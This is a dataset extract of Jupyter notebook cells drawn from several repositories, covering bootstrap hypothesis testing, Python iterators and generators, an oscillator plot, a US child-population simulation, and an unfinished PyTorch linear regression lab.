Columns: markdown (string), code (string), output (string), license (string), path (string), repo_name (string)
Simulating From the Null Hypothesis

Load in the data below, and work through the questions to answer the quiz questions that follow.
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline

np.random.seed(42)

full_data = pd.read_csv('../data/coffee_dataset.csv')
sample_data = full_data.sample(200)
_____no_output_____
MIT
hypothesis_testing/10_HypothesisTesting/13_Simulating From the Null Hypothesis.ipynb
Zabamund/datasci-nano
`1.` If you were interested in whether the average height for coffee drinkers is the same as for non-coffee drinkers, what would the null and alternative hypotheses be? Place them in the cell below, and use your answer for the first quiz question below.

**Since there is no directional component associated with this statement, a not-equal-to alternative seems most reasonable.**

$$H_0: \mu_{coff} - \mu_{no} = 0$$
$$H_1: \mu_{coff} - \mu_{no} \neq 0$$

**$\mu_{coff}$ and $\mu_{no}$ are the population mean heights for coffee drinkers and non-coffee drinkers, respectively.**

`2.` If you were interested in whether the average height for coffee drinkers is less than that for non-coffee drinkers, what would the null and alternative hypotheses be? Place them in the cell below, and use your answer for the second quiz question below.

**In this case, there is a direction associated with the question - that the average height for coffee drinkers is less than for non-coffee drinkers. Below is one way you could write the null and alternative. Since the mean for coffee drinkers is listed first, the alternative suggests that this difference is negative.**

$$H_0: \mu_{coff} - \mu_{no} \geq 0$$
$$H_1: \mu_{coff} - \mu_{no} < 0$$

**$\mu_{coff}$ and $\mu_{no}$ are the population mean heights for coffee drinkers and non-coffee drinkers, respectively.**

`3.` For 10,000 iterations: bootstrap the sample data, calculate the mean height for coffee drinkers and for non-coffee drinkers, and calculate the difference in means for each sample. You will want three arrays at the end of the iterations - one for each mean and one for the difference in means. Use the results of your sampling distribution to answer the third quiz question below.
nocoff_means, coff_means, diffs = [], [], []

for _ in range(10000):
    bootsamp = sample_data.sample(200, replace=True)
    coff_mean = bootsamp[bootsamp['drinks_coffee'] == True]['height'].mean()
    nocoff_mean = bootsamp[bootsamp['drinks_coffee'] == False]['height'].mean()
    # append the info
    coff_means.append(coff_mean)
    nocoff_means.append(nocoff_mean)
    diffs.append(coff_mean - nocoff_mean)

np.std(nocoff_means)  # the standard deviation of the sampling distribution for nocoff
np.std(coff_means)  # the standard deviation of the sampling distribution for coff
np.std(diffs)  # the standard deviation of the sampling distribution for the difference in means

plt.hist(nocoff_means, alpha=0.5);
plt.hist(coff_means, alpha=0.5);  # They look pretty normal to me!

plt.hist(diffs, alpha=0.5);  # again normal - this is by the central limit theorem
_____no_output_____
MIT
hypothesis_testing/10_HypothesisTesting/13_Simulating From the Null Hypothesis.ipynb
Zabamund/datasci-nano
`4.` Now, use your sampling distribution for the difference in means and [the docs](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.random.normal.html) to simulate what you would expect if your sampling distribution were centered on zero. Also, calculate the observed sample mean difference in `sample_data`. Use your solutions to answer the last questions in the quiz below.

**We would expect the sampling distribution to be normal by the Central Limit Theorem, and we know the standard deviation of the sampling distribution of the difference in means from the previous question, so we can use this to simulate draws from the sampling distribution under the null hypothesis. If there is truly no difference, then the difference between the means should be zero.**
null_vals = np.random.normal(0, np.std(diffs), 10000)  # Here are 10000 draws from the sampling distribution under the null

plt.hist(null_vals);  # Here is the sampling distribution of the difference under the null
_____no_output_____
MIT
hypothesis_testing/10_HypothesisTesting/13_Simulating From the Null Hypothesis.ipynb
Zabamund/datasci-nano
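As a hedged sketch (not part of the original notebook) of the remaining step, the observed difference in `sample_data` and a two-sided p-value could be computed as follows, assuming the same column names and the `null_vals` array created above.

```python
# Sketch only: observed difference in mean heights from the original sample
obs_coff = sample_data[sample_data['drinks_coffee'] == True]['height'].mean()
obs_nocoff = sample_data[sample_data['drinks_coffee'] == False]['height'].mean()
obs_diff = obs_coff - obs_nocoff

# Two-sided p-value: proportion of null draws at least as extreme as the observed difference
p_value = (np.abs(null_vals) >= np.abs(obs_diff)).mean()
print(obs_diff, p_value)
```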
## Iterators, Generators, and Uncertainty

Suppose you are working on a Python API that provides access to a real-time data stream (perhaps from an array of sensors or from a web service that handles user requests). You would like to deliver to the consumers of your API a simple but flexible abstraction that allows them to operate on new items from the stream when they choose to do so. Furthermore, you would like the API to allow users to do the following three things:

* specify fall-back or default data streams (*e.g.*, if their first choice of stream is exhausted);
* interleave items coming from multiple streams (presenting them as a single, new stream); and
* process the items from a stream in parallel using multiprocessing.

What abstraction should you use? How much of it must be custom-built and how much can be done using native Python features? When working with data streams, state spaces, and other abstractions that represent large or unbounded structures, it can be tempting to custom-build solutions that may become increasingly complex and difficult to maintain. Understanding a range of features that are already available in a language or its built-in libraries can help mitigate this while saving significant time and effort (both your own and that of others who build upon your work).

Iterators and generators are powerful tools in the Python language that have compelling applications in a number of contexts. This article reviews how they are defined, how they can be used, how they are related to one another, and how they can help you work in an elegant and flexible way with data structures and data streams of an unknown or infinite size.

## Iterables, Iterators, and Generators

When discussing Python, the terms *iterable*, *iterator*, and *generator* often appear in similar contexts or are even used interchangeably. These language features also solve similar problems. This can lead to some confusion, but there is a reason that on occasion these are conflated.

One way to understand the term *iterator* is that it refers to *any* Python data structure that *has an interface* that supports iteration over objects one at a time. A data structure is *iterable* if there is *at least one way* to construct an iterator that traverses it in some way. On the other hand, a *generator* is a particular kind of data structure, defined in a specific way within Python, that maintains an internal state and constructs or retrieves zero or more objects or values one at a time. Thus, a generator by virtue of its characteristics can have an interface that allows it to qualify as an iterator, which consequently also makes it an iterable. In fact, all generators are iterators and iterable. However, not all iterators or iterable data structures are generators, because there exist other approaches for building a Python object that possesses the kind of interface an iterator or iterable is expected to have.

## Iterators

If you want to implement an iterator data structure directly, you need to include a special method `__next__` in the class definition, which will be invoked whenever the built-in [`next`](https://docs.python.org/3/library/functions.html#next) function is applied to an instance of that data structure. The `skips` data structure below can emit every other positive integer via its definition of a `__next__` method.
class skips:
    def __init__(self):
        self.integer = 0

    def __next__(self):
        self.integer += 2
        return self.integer
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Now it is possible to use the built-in [`next`](https://docs.python.org/3/library/functions.html#next) function to retrieve each item one at a time from an instance of the `skips` data structure.
ns = skips()
[next(ns), next(ns), next(ns)]
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
The number of items over which the data structure will iterate can be limited by raising the `StopIteration` exception when no more items can (or should) be returned.
class skips:
    def __init__(self, start, end):
        self.integer = start - 2
        self.end = end

    def __next__(self):
        self.integer += 2
        if self.integer > self.end:
            raise StopIteration
        return self.integer
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
It is then the responsibility of any code that uses an instance of this iterator to catch this exception and handle it appropriately. It is worth acknowledging that this is a somewhat unusual use of a language feature normally associated with catching errors (because an iterator being exhausted is not always an error condition).
ns = skips(0, 10)
while True:
    try:
        print(next(ns))
    except StopIteration:
        break
0 2 4 6 8 10
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
## Iterables

In Python, there is a distinction between an *iterator* and an *iterable data structure*. This distinction is useful to maintain for a variety of reasons, including the ones below.

* You may not want to clutter a data structure (as it may represent a spreadsheet, a database table, a large graph, and so on) with the state necessary to keep track of an iteration process.
* You may want the data structure to support *multiple* iterators, either semantically (*e.g.*, iteration over rows versus over columns) or in terms of implementation (*e.g.*, breadth-first search versus depth-first search).
* You may want to make it easy to *reset* iteration without fiddling with the internal state of a data structure instance (*i.e.*, resetting a traversal of the data structure instance could involve simply creating a fresh iterator).

As an example, consider a data structure `interval` that represents all positive integers in some range. Users might be allowed to obtain two different kinds of iterators for an instance of this data structure: those that iterate over only the even integers and those that iterate over only the odd integers.
class interval:
    def __init__(self, lower, upper):
        self.lower = lower
        self.upper = upper

    def evens(self):
        return skips(
            self.lower + (0 if (self.lower % 2) == 0 else 1),
            self.upper
        )

    def odds(self):
        return skips(
            self.lower + (0 if (self.lower % 2) == 1 else 1),
            self.upper
        )
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
The example below illustrates how an iterator returned by one of the methods in the definition of `interval` can be used.
ns = interval(0, 10).odds()
while True:  # Keep iterating and printing until exhaustion.
    try:
        print(next(ns))
    except StopIteration:
        break
1 3 5 7 9
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
So far in this article, the distinction between *iterators* and *iterable data structures* has been explicit for clarity. However, the convention that is supported (and sometimes expected) throughout Python is that an iterable data structure has a *single* iterator that can be used to iterate over it. This iterator is returned by a special method [`__iter__`](https://docs.python.org/3/reference/datamodel.html#object.__iter__) that is included in the class definition. In the example below, the `interval` class supports the creation of an iterator that visits every integer in the interval.
class every:
    def __init__(self, start, end):
        self.integer = start - 1
        self.end = end

    def __next__(self):
        self.integer += 1
        if self.integer > self.end:
            raise StopIteration
        return self.integer

class interval:
    def __init__(self, lower, upper):
        self.lower = lower
        self.upper = upper

    def __iter__(self):
        return every(self.lower, self.upper)
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Python's built-in [`iter`](https://docs.python.org/3/library/functions.html#iter) function can be used to invoke `__iter__` for an instance of this data structure.
ns = iter(interval(1, 3))
while True:  # Keep iterating and printing until exhaustion.
    try:
        print(next(ns))
    except StopIteration:
        break
1 2 3
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Including a definition for an `__iter__` method also makes it possible to use many of Python's built-in functions and language constructs that expect an iterable data structure. This includes functions such as [`list`](https://docs.python.org/3/library/functions.html#func-list) and [`set`](https://docs.python.org/3/library/functions.html#func-set), which use `iter` to obtain an iterator for their inputs.
list(interval(0, 10)), set(interval(0, 10))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
This also includes comprehensions and `for` loops.
for n in interval(1, 4):
    print([k for k in interval(1, n)])
[1] [1, 2] [1, 2, 3] [1, 2, 3, 4]
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
There is nothing stopping you from making the iterator itself an iterable by having it return itself, as in the variant below.
class every:
    def __init__(self, start, end):
        self.integer = start - 1
        self.end = end

    def __next__(self):
        self.integer += 1
        if self.integer > self.end:
            raise StopIteration
        return self.integer

    def __iter__(self):
        return self
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
This approach ensures that there is no ambiguity (from a programmer's perspective) about what will happen when built-in functions such as `list` are applied to an instance of the data structure.
list(every(0, 10))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
This practice is common and is the cause of some of the confusion and conflation that occurs between iterators and iterables. In addition to the potential for confusion, users of such a data structure must be careful to use the iterator as an iterable only once (or, alternatively, the object must reset its internal state every time `__iter__` is invoked).
ns = every(0, 10)
list(ns), list(ns)  # Only returns contents the first time.
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
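As a hedged illustration (added here, not from the original article) of the alternative mentioned above, a variant of `every` could reset its internal state each time `__iter__` is invoked; the attribute names simply mirror the earlier definition.

```python
class every:
    def __init__(self, start, end):
        self.start = start
        self.end = end
        self.integer = start - 1

    def __iter__(self):
        # Reset the cursor so each new iteration starts from the beginning.
        self.integer = self.start - 1
        return self

    def __next__(self):
        self.integer += 1
        if self.integer > self.end:
            raise StopIteration
        return self.integer

ns = every(0, 10)
print(list(ns), list(ns))  # Both calls now return the full contents.
```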
Nevertheless, this can also be a useful practice. Going back to the example with `evens` and `odds`, ensuring the iterators returned by these methods are also iterable means they can be fed directly into contexts that expect an iterable.
class skips:
    def __init__(self, start, end):
        self.integer = start - 2
        self.end = end

    def __next__(self):
        self.integer += 2
        if self.integer > self.end:
            raise StopIteration
        return self.integer

    def __iter__(self):
        return self

class interval:
    def __init__(self, lower, upper):
        self.lower = lower
        self.upper = upper

    def evens(self):
        return skips(
            self.lower + (0 if (self.lower % 2) == 0 else 1),
            self.upper
        )

    def odds(self):
        return skips(
            self.lower + (0 if (self.lower % 2) == 1 else 1),
            self.upper
        )
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
The example below illustrates how this kind of interface can be used.
i = interval(0, 10)
list(i.evens()), set(i.odds())
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
## Generators

Generators are data structures defined using either the `yield` statement or comprehension notation (also known as a [generator expression](https://docs.python.org/3/glossary.html#term-generator-expression)). The example below defines a generator `skips` using both approaches.
def skips(start, end):
    integer = start
    while integer <= end:
        yield integer
        integer += 2

def skips(start, end):
    return (
        integer
        for integer in range(start, end)
        if (integer - start) % 2 == 0
    )
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
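One small caveat worth noting (an observation added here, not present in the original text): the two definitions above differ at the endpoint, since the `while` version includes `end` but `range(start, end)` excludes it. A quick check under that assumption:

```python
def skips_while(start, end):
    integer = start
    while integer <= end:
        yield integer
        integer += 2

def skips_range(start, end):
    return (integer for integer in range(start, end) if (integer - start) % 2 == 0)

print(list(skips_while(0, 10)))  # [0, 2, 4, 6, 8, 10]
print(list(skips_range(0, 10)))  # [0, 2, 4, 6, 8]
```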
When it is evaluated, a generator returns an iterator (more precisely called a [generator iterator](https://docs.python.org/3/glossary.html#term-generator-iterator)). These are technically both iterators and iterables. For example, as with any iterator, `next` can be applied directly to instances of this data structure.
ns = skips(0, 10)
next(ns), next(ns), next(ns)
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
As with any iterator, exhaustion can be detected by catching the `StopIteration` exception.
ns = skips(0, 2)
try:
    next(ns), next(ns), next(ns)
except StopIteration:
    print("Exhausted generator iterator.")
Exhausted generator iterator.
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Finally, an instance of the data structure can be used in any context that expects an iterable.
list(skips(0, 10))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
It is possible to confirm that the result of evaluating `skips` is indeed a generator by checking its type.
import types
isinstance(skips(0, 10), types.GeneratorType)
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
It is also possible to inspect its type to confirm that `skips` indeed evaluates to an iterator.
import collections
isinstance(skips(0, 10), collections.abc.Iterator)
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
## Data Structures of Infinite or Unknown Size

Among the use cases that demonstrate how iterators/generators serve as a powerful language feature are scenarios involving data structures whose size is unknown or unbounded/infinite (such as streams, very large files, databases, and so on). You have already seen that you can define an iterable that can produce new objects or values indefinitely, so iterables are an effective way to represent and encapsulate such structures.

Returning to the example described at the beginning of the article, recall that you are faced with creating a Python API for working with data streams that might (or might not) run out of items that can be drawn from them. The advantages of leveraging iterables and generators should be evident at this point, so suppose you move ahead with this option and implement an iterable to represent a data stream. How can you address the three specific requirements (*i.e.*, default/fall-back streams, interleaving, and splitting for parallelism) using these features?

To satisfy the first requirement, you must allow a user to exhaust one iterable and then switch to another one. This is straightforward to do by constructing a generator that concatenates two iterables.
def concatenate(xs, ys):
    for x in xs:
        yield x
    for y in ys:
        yield y
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Concatenating two instances of an iterable data structure is now straightforward.
list(concatenate(skips(0,5), skips(6,11)))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
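As a side note (not in the original article), the built-in `itertools.chain` function provides this same concatenation behavior, so a hand-written generator is not strictly required.

```python
from itertools import chain

list(chain(skips(0, 5), skips(6, 11)))  # Same result as concatenate(skips(0, 5), skips(6, 11))
```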
Notice that if the first iterable is never exhausted, the second one will never be used. To address the second requirement, first consider a simpler scenario. What if you would like to "line up" or "pair up" entries in two or more iterables? You can use the built-in [`zip`](https://docs.python.org/3/library/functions.html#zip) function.
list(zip(skips(0,5), skips(6,11)))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Notice that the result of evaluating `zip` is indeed an iterator.
import collections
isinstance(
    zip(skips(0, 5), skips(6, 11)),
    collections.abc.Iterator
)
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Combining `zip` with comprehension syntax, you can now define a generator that *interleaves* two iterables (switching back and forth between emitting an item from one and then the other).
def interleave(xs, ys):
    return (
        z
        for (x, y) in zip(xs, ys)
        for z in (x, y)
    )
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
As with concatenation, interleaving is now concise and straightforward.
list(interleave(skips(0,5), skips(6,11)))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
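A note added here (not part of the original article): because `zip` stops as soon as the shorter input is exhausted, `interleave` silently drops any leftover items from the longer stream. If the remainder should be kept as well, one option under that assumption is `itertools.zip_longest` with a sentinel value.

```python
from itertools import zip_longest

def interleave_all(xs, ys, _sentinel=object()):
    # Alternate between the two iterables, then drain whichever one is longer.
    return (
        z
        for (x, y) in zip_longest(xs, ys, fillvalue=_sentinel)
        for z in (x, y)
        if z is not _sentinel
    )

list(interleave_all(skips(0, 5), skips(6, 21)))
```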
Finally, how can you help users process items from a stream in parallel? Because you are already using iterables, users have some options available to them from the built-in [`itertools`](https://docs.python.org/3/library/itertools.html) library. One option is [`islice`](https://docs.python.org/3/library/itertools.html#itertools.islice), which behaves in a similar manner to Python [slice notation](https://docs.python.org/3/library/functions.html?highlight=slice#slice) (such as `xs[0:10]` to extract the first ten entries from a list `xs`). Users can use this function to extract items in batches and (1) pass each item in a batch to its own separate thread or (2) pass batches of items to separate threads. A basic batching method is presented below.
from itertools import islice

def batch(xs, size):
    ys = list(islice(xs, 0, size))
    while len(ys) > 0:
        yield ys
        ys = list(islice(xs, 0, size))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Notice that this method inherits the graceful behavior of slice notation when the boundaries of the slices do not line up exactly with the number of entries in the data structure instance.
list(batch(skips(0,21), 3))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Can you define a generator that returns batches of batches (*e.g.*, at most `n` batches each of size at most `k`)? One possible approach is sketched after the `tee` example below. Another option is to use the [`tee`](https://docs.python.org/3/library/itertools.html#itertools.tee) function, which can duplicate a single iterable into multiple iterables. However, this function is really only simulating this effect by storing a large amount of auxiliary information from one of the iterables. Thus, it may use a significant amount of memory and is not safe to use with multiprocessing. It is best suited for situations in which the iterables are known to have a small number of items, as in the example below.
from itertools import tee

(a, b) = tee(skips(0, 11), 2)
(list(a), list(b))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
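Returning to the exercise posed above, here is one hedged sketch (added here, not the author's solution): batches of batches can be obtained by applying the `batch` generator defined earlier to its own output.

```python
def batch_of_batches(xs, n, k):
    # Group items into inner batches of size at most k, then group those
    # batches into outer batches containing at most n inner batches each.
    return batch(batch(xs, k), n)

list(batch_of_batches(skips(0, 21), n=2, k=3))
# e.g. [[[0, 2, 4], [6, 8, 10]], [[12, 14, 16], [18, 20]]]
```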
The example above is arguably implemented in a clearer and more familiar way by simply wrapping the iterable using `list`.
ns = list(skips(0, 11))
(ns, ns)
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
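To close the loop on the third requirement from the introduction, here is a hedged sketch (not from the original article) of how batches drawn from an iterable might be distributed across worker processes using the standard `multiprocessing` module; the `work` function is a hypothetical placeholder.

```python
from multiprocessing import Pool

def work(item):
    # Hypothetical per-item computation.
    return item * item

if __name__ == '__main__':
    with Pool(4) as pool:
        for ys in batch(skips(0, 21), 3):
            # Each batch of items is processed in parallel by the pool.
            print(pool.map(work, ys))
```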
GRAVITY ASSIGNMENT
%matplotlib inline
import matplotlib.pyplot as plt
import numpy as np

m = 1
x_0 = .5
x_0_dot = .1
t = np.linspace(0, 50, 300)

gravedad = np.array([9.81, 2.78, 8.87, 3.72, 22.88])
gravedad

plt.figure(figsize=(7, 4))
for indx, g in enumerate(gravedad):
    omega_0 = np.sqrt(g/m)
    x_t = x_0 * np.cos(omega_0 * t) + (x_0_dot/omega_0) * np.sin(omega_0 * t)
    x_t_dot = -omega_0 * x_0 * np.sin(omega_0 * t) + x_0_dot * np.cos(omega_0 * t)
    plt.plot(x_t, x_t_dot/omega_0, 'ro', ms=2)
    # Note: legend() is called before any labelled artist exists, which triggers the warning below.
    plt.legend(loc='best', bbox_to_anchor=(1.01, 0.5), prop={'size': 14})
    plt.scatter(x_t, (x_t_dot/omega_0), cmap="viridis", label=g)
plt.show()
C:\Users\MaríaEsther\Anaconda3\lib\site-packages\matplotlib\axes\_axes.py:545: UserWarning: No labelled objects found. Use label='...' kwarg on individual plots. warnings.warn("No labelled objects found. "
MIT
Gravedad.ipynb
Urakami97/Gravedad-Tarea-
Modeling and Simulation in Python - Project 1

Dhara Patel and Corinne Wilklow

Copyright 2018 Allen Downey

License: [Creative Commons Attribution 4.0 International](https://creativecommons.org/licenses/by/4.0)
# Configure Jupyter so figures appear in the notebook
%matplotlib inline

# Configure Jupyter to display the assigned value after an assignment
%config InteractiveShell.ast_node_interactivity='last_expr_or_assign'

# import functions from the modsim library
from modsim import *
from pandas import read_html

print('done')

# Importing Population Data
filename = 'data/US_Population_data.html'
tables = read_html(filename, header=0, index_col=0, decimal='M')
table = tables[3]
table1 = table[1910.0:2010.0]
table1.columns = ['population']
print(table1)
population Censusyear 1910.0 92228496.0 1920.0 106021537.0 1930.0 123202624.0 1940.0 132164569.0 1950.0 151325798.0 1960.0 179323175.0 1970.0 203211926.0 1980.0 226545805.0 1990.0 248709873.0 2000.0 281421906.0 2010.0 308745538.0
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
The state: initial child population, initial United States population

The system: birth rates, child mortality rates, mature rates (birth rates 18 years prior)

Metrics: annual child population
def plot_results(population, childseries, title):
    """Plot the estimates and the model.

    population: TimeSeries of historical population data
    childseries: TimeSeries of child population estimates
    title: string
    """
    plot(population, ':', label='US Population')
    if len(childseries):
        plot(childseries, color='gray', label='US Children')
        # plot(ratioseries, label='Ratio of children')
    decorate(xlabel='Year',
             ylabel='Population (million)',
             title=title)

def plot_ratio(ratioseries, title):
    """Plot the estimates and the model.

    population: TimeSeries of historical population data
    childseries: TimeSeries of child population estimates
    title: string
    """
    if len(ratioseries):
        plot(ratioseries, color='gray', label='Ratio of Children')
        # plot(ratioseries, label='Ratio of children')
    decorate(xlabel='Year',
             ylabel='Population (million)',
             title=title)

population = table1.population / 1e6
childseries = TimeSeries()
ratioseries = TimeSeries()

plot_results(population, childseries, 'U.S. population')
_____no_output_____
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
Why is the proportion of children in the United States decreasing? Over the past two decades, the United States population grew by about 20%. During the same time frame, the nation’s child population grew by only 5%. The population all around the world is aging, and children represent a smaller and smaller share of it. There are other countries in which this decrease is more dramatic, such as Germany or Japan which no longer have a positive natural increase in population. A decreasing proportion of children is a problem because the issue will only compound over time, until the population as a whole begins to decline. The decreasing ratio of children could be due to several factors: declining fertility rates, an aging population, and a drop in net immigration levels. Our model focuses on the effects of fertility rates and child mortality rates on proportions of children in the US. Specifically, if we sweep birthrates and child mortality rates, what effects does that have on the population as a whole? Could changing birth rates and death rates account for the entirety of the changing demographics? We will use US Census data from 1910-2010 to compare to our results.
# sweeping both the mortality rate and the birth rate will make the model more accurate
birthrate = [29.06, 25.03, 19.22, 22.63, 24.86, 20.33, 15.57, 15.83, 15.08, 13.97]
deathrate = linspace(0.0065, 0.0031, 10)
maturerate = [31.5, 29.06, 25.03, 19.22, 22.63, 24.86, 20.33, 15.57, 15.83, 15.08]

print(birthrate)
print(deathrate)
print(maturerate)

state = State(children = 47.3,
              t_pop = 151325798.0/1e6,
              ratio = 47.3/151325798.0/1e6)
_____no_output_____
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
Parameters:
system = System(birthrate = birthrate,
                maturerate = maturerate,
                deathrate = deathrate,
                t_0 = 1910.0,
                t_end = 2010.0,
                state = state)
_____no_output_____
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
Our update function computes the updated state of these parameters at the end of each ten year increment.
def update_func1(state, t, system):
    t_pop = 151325798.0

    if t == 1910:
        i = int((t-1910)/10)
    else:
        i = int((t-1910)/10 - 1)

    mrate = system.maturerate
    brate = system.birthrate
    drate = system.deathrate

    births = brate[i]/100 * state.children      # metric
    maturings = mrate[i]/100 * state.children   # metric
    deaths = drate[i]/100 * state.children      # metric

    population = state.children + births - maturings - deaths
    #print('children', children)

    return State(children=population)
_____no_output_____
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
To test our update function, we'll input the initial condition:
update_func1(state, system.t_0, system)

def run_simulation(state, system, update_func):
    """Simulate the system using any update function.

    state: initial State object
    system: System object
    update_func: function that computes the population next year

    returns: TimeSeries of Ratios
    """
    #t_pop=151325798.0
    results = TimeSeries()
    state = system.state
    results[system.t_0] = state.children

    for t in linrange(1910.0, 2020.0):
        if t % 10 == 0:
            '''if t == 1910:
                i = int((t-1910)/10)
            else:
                i = int((t-1910)/10 - 1)'''
            state.children = update_func1(state, t, system)
            results[t] = state.children

    return results

print(population[1910])

'''def update_ratio(state, t, system):
    childpop = state.children
    popu = population[t]
    ratio = childpop/popu
    return State(ratio = ratio)

def run_ratio(state, system, update_ratio):
    results = TimeSeries()
    results[system.t_0] = state.ratio
    for t in linrange(1910.0, 2020.0):
        if t % 10 == 0:
            results[t] = update_ratio(state, t, system)'''

childseries = run_simulation(state, system, update_func1)

for t in linrange(1910.0, 2020.0):
    if t % 10 == 0:
        ratioseries[t] = childseries[t]/population[t]

print(ratioseries)

empty = TimeSeries()
fig1 = plot_results(population, childseries, 'Population of children in U.S.')
fig2 = plot_ratio(ratioseries, 'Ratio of children in the U.S.')
_____no_output_____
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
How to set up a technical note-taking environment using Jupyter (IPython) Notebook - myenigma.hatenablog.com
from sympy import *

x = Symbol('x')
%matplotlib inline
init_printing()

expand((x - 3)**5)
_____no_output_____
MIT
.ipynb_checkpoints/learnJupyter-checkpoint.ipynb
kalz2q/files
Linear Regression Multiple Outputs

Table of Contents

In this lab, you will create a model the PyTorch way. This will help you build more complicated models.

- Make Some Data
- Create the Model and Cost Function the PyTorch way
- Train the Model: Batch Gradient Descent

Estimated Time Needed: 20 min

Preparation

We'll need the following libraries:
# Import the libraries we need for this lab
from torch import nn, optim
import torch
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from torch.utils.data import Dataset, DataLoader
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Set the random seed:
# Set the random seed to 1.
torch.manual_seed(1)
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Use this function for plotting:
# The function for plotting 2D
def Plot_2D_Plane(model, dataset, n=0):
    w1 = model.state_dict()['linear.weight'].numpy()[0][0]
    w2 = model.state_dict()['linear.weight'].numpy()[0][1]
    b = model.state_dict()['linear.bias'].numpy()

    # Data
    x1 = data_set.x[:, 0].view(-1, 1).numpy()
    x2 = data_set.x[:, 1].view(-1, 1).numpy()
    y = data_set.y.numpy()

    # Make plane
    X, Y = np.meshgrid(np.arange(x1.min(), x1.max(), 0.05), np.arange(x2.min(), x2.max(), 0.05))
    yhat = w1 * X + w2 * Y + b

    # Plotting
    fig = plt.figure()
    ax = fig.gca(projection='3d')

    ax.plot(x1[:, 0], x2[:, 0], y[:, 0], 'ro', label='y')  # Scatter plot

    ax.plot_surface(X, Y, yhat)  # Plane plot

    ax.set_xlabel('x1 ')
    ax.set_ylabel('x2 ')
    ax.set_zlabel('y')
    plt.title('estimated plane iteration:' + str(n))
    ax.legend()

    plt.show()
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Make Some Data

Create a dataset class with two-dimensional features:
# Create a 2D dataset
class Data2D(Dataset):

    # Constructor
    def __init__(self):
        self.x = torch.zeros(20, 2)
        self.x[:, 0] = torch.arange(-1, 1, 0.1)
        self.x[:, 1] = torch.arange(-1, 1, 0.1)
        self.w = torch.tensor([[1.0], [1.0]])
        self.b = 1
        self.f = torch.mm(self.x, self.w) + self.b
        self.y = self.f + 0.1 * torch.randn((self.x.shape[0], 1))
        self.len = self.x.shape[0]

    # Getter
    def __getitem__(self, index):
        return self.x[index], self.y[index]

    # Get Length
    def __len__(self):
        return self.len
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create a dataset object:
# Create the dataset object
data_set = Data2D()
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create the Model, Optimizer, and Total Loss Function (Cost)

Create a customized linear regression module:
# Create a customized linear
class linear_regression(nn.Module):

    # Constructor
    def __init__(self, input_size, output_size):
        super(linear_regression, self).__init__()
